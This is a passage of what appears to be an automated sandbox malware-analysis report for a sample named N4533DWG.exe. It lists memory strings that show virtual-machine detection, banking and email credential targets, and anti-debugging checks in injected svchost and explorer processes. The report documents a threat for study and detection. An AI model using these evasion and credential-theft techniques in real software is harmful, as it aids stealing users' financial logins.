                Source: explorer.exe, 00000020.00000002.2529797083.0000000004D32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}g>
                Source: CLp00JCM5.10.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: explorer.exe, 0000001B.00000002.2467271837.0000000009AE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000@v
                Source: explorer.exe, 00000010.00000003.2265206144.0000000007720000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Pro
                Source: CLp00JCM5.10.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: CLp00JCM5.10.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: CLp00JCM5.10.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: explorer.exe, 0000001B.00000003.2367786238.0000000007CD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: user-PC\userAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 0000001B.00000002.2467271837.0000000009AE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWMER_HWNDriverStore\en-GB\machine.inf_locP
                Source: CLp00JCM5.10.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: explorer.exe, 0000001B.00000003.2372826589.0000000007C42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
                Source: CLp00JCM5.10.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: CLp00JCM5.10.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: explorer.exe, 0000001B.00000003.2367786238.0000000007CD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: CLp00JCM5.10.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: CLp00JCM5.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: explorer.exe, 00000020.00000002.2530452279.0000000006EF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver0
                Source: explorer.exe, 0000001B.00000002.2458110110.0000000007C42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
                Source: ICpHO9L5D6CxaaNC.exe, 0000000B.00000002.2527847958.0000000001509000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000C.00000002.1861562861.00000140955AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: CLp00JCM5.10.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: explorer.exe, 00000020.00000003.2469857811.0000000007057000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
                Source: CLp00JCM5.10.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: where.exe, 0000000A.00000002.2253277253.0000000000B35000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
                Source: explorer.exe, 00000010.00000002.2357640050.0000000000734000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*T
                Source: explorer.exe, 00000020.00000003.2469857811.0000000007057000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: CLp00JCM5.10.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: explorer.exe, 0000001B.00000003.2372826589.0000000007B9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTVMWare
                Source: CLp00JCM5.10.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: CLp00JCM5.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: explorer.exe, 00000020.00000002.2532222982.000000000811E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWF
                Source: CLp00JCM5.10.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: CLp00JCM5.10.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: CLp00JCM5.10.drBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: CLp00JCM5.10.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: explorer.exe, 00000010.00000002.2357640050.0000000000734000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000n<bA
                Source: CLp00JCM5.10.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: CLp00JCM5.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: explorer.exe, 00000020.00000002.2532222982.00000000082CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                Source: CLp00JCM5.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: CLp00JCM5.10.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: explorer.exe, 00000020.00000002.2525034811.0000000000523000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\where.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7096E rdtsc 2_2_02F7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417BD3 LdrLoadDll,2_2_00417BD3
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0038401F BlockInput,0_2_0038401F
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_00313B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00313B4C
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_00345BFC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00345BFC
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0038C104 LoadLibraryA,GetProcAddress,0_2_0038C104
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_02043460 mov eax, dword ptr fs:[00000030h]0_2_02043460
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_020434C0 mov eax, dword ptr fs:[00000030h]0_2_020434C0
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_02041E70 mov eax, dword ptr fs:[00000030h]0_2_02041E70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h]2_2_02F402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h]2_2_02F402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h]2_2_02F402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02F3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02F3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02F3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02F3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02F3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F402A0 mov eax, dword ptr fs:[00000030h]2_2_02F402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F402A0 mov eax, dword ptr fs:[00000030h]2_2_02F402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]2_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov ecx, dword ptr fs:[00000030h]2_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]2_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]2_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]2_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]2_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E284 mov eax, dword ptr fs:[00000030h]2_2_02F6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E284 mov eax, dword ptr fs:[00000030h]2_2_02F6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h]2_2_02FB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h]2_2_02FB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h]2_2_02FB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h]2_2_02F34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h]2_2_02F34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h]2_2_02F34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2826B mov eax, dword ptr fs:[00000030h]2_2_02F2826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A250 mov eax, dword ptr fs:[00000030h]2_2_02F2A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36259 mov eax, dword ptr fs:[00000030h]2_2_02F36259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB8243 mov eax, dword ptr fs:[00000030h]2_2_02FB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB8243 mov ecx, dword ptr fs:[00000030h]2_2_02FB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2823B mov eax, dword ptr fs:[00000030h]2_2_02F2823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]2_2_02F4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]2_2_02F4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]2_2_02F4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F663FF mov eax, dword ptr fs:[00000030h]2_2_02F663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE3DB mov eax, dword ptr fs:[00000030h]2_2_02FDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE3DB mov eax, dword ptr fs:[00000030h]2_2_02FDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE3DB mov ecx, dword ptr fs:[00000030h]2_2_02FDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE3DB mov eax, dword ptr fs:[00000030h]2_2_02FDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD43D4 mov eax, dword ptr fs:[00000030h]2_2_02FD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD43D4 mov eax, dword ptr fs:[00000030h]2_2_02FD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEC3CD mov eax, dword ptr fs:[00000030h]2_2_02FEC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]2_2_02F383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]2_2_02F383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]2_2_02F383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]2_2_02F383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB63C0 mov eax, dword ptr fs:[00000030h]2_2_02FB63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h]2_2_02F28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h]2_2_02F28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h]2_2_02F28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h]2_2_02F2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h]2_2_02F2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h]2_2_02F2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5438F mov eax, dword ptr fs:[00000030h]2_2_02F5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5438F mov eax, dword ptr fs:[00000030h]2_2_02F5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD437C mov eax, dword ptr fs:[00000030h]2_2_02FD437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov ecx, dword ptr fs:[00000030h]2_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFA352 mov eax, dword ptr fs:[00000030h]2_2_02FFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C310 mov ecx, dword ptr fs:[00000030h]2_2_02F2C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F50310 mov ecx, dword ptr fs:[00000030h]2_2_02F50310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h]2_2_02F6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h]2_2_02F6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h]2_2_02F6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C0F0 mov eax, dword ptr fs:[00000030h]2_2_02F2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F720F0 mov ecx, dword ptr fs:[00000030h]2_2_02F720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_02F2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F380E9 mov eax, dword ptr fs:[00000030h]2_2_02F380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB60E0 mov eax, dword ptr fs:[00000030h]2_2_02FB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB20DE mov eax, dword ptr fs:[00000030h]2_2_02FB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF60B8 mov eax, dword ptr fs:[00000030h]2_2_02FF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF60B8 mov ecx, dword ptr fs:[00000030h]2_2_02FF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC80A8 mov eax, dword ptr fs:[00000030h]2_2_02FC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3208A mov eax, dword ptr fs:[00000030h]2_2_02F3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5C073 mov eax, dword ptr fs:[00000030h]2_2_02F5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F32050 mov eax, dword ptr fs:[00000030h]2_2_02F32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6050 mov eax, dword ptr fs:[00000030h]2_2_02FB6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6030 mov eax, dword ptr fs:[00000030h]2_2_02FC6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A020 mov eax, dword ptr fs:[00000030h]2_2_02F2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C020 mov eax, dword ptr fs:[00000030h]2_2_02F2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]2_2_02F4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]2_2_02F4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]2_2_02F4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]2_2_02F4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030061E5 mov eax, dword ptr fs:[00000030h]2_2_030061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB4000 mov ecx, dword ptr fs:[00000030h]2_2_02FB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F601F8 mov eax, dword ptr fs:[00000030h]2_2_02F601F8
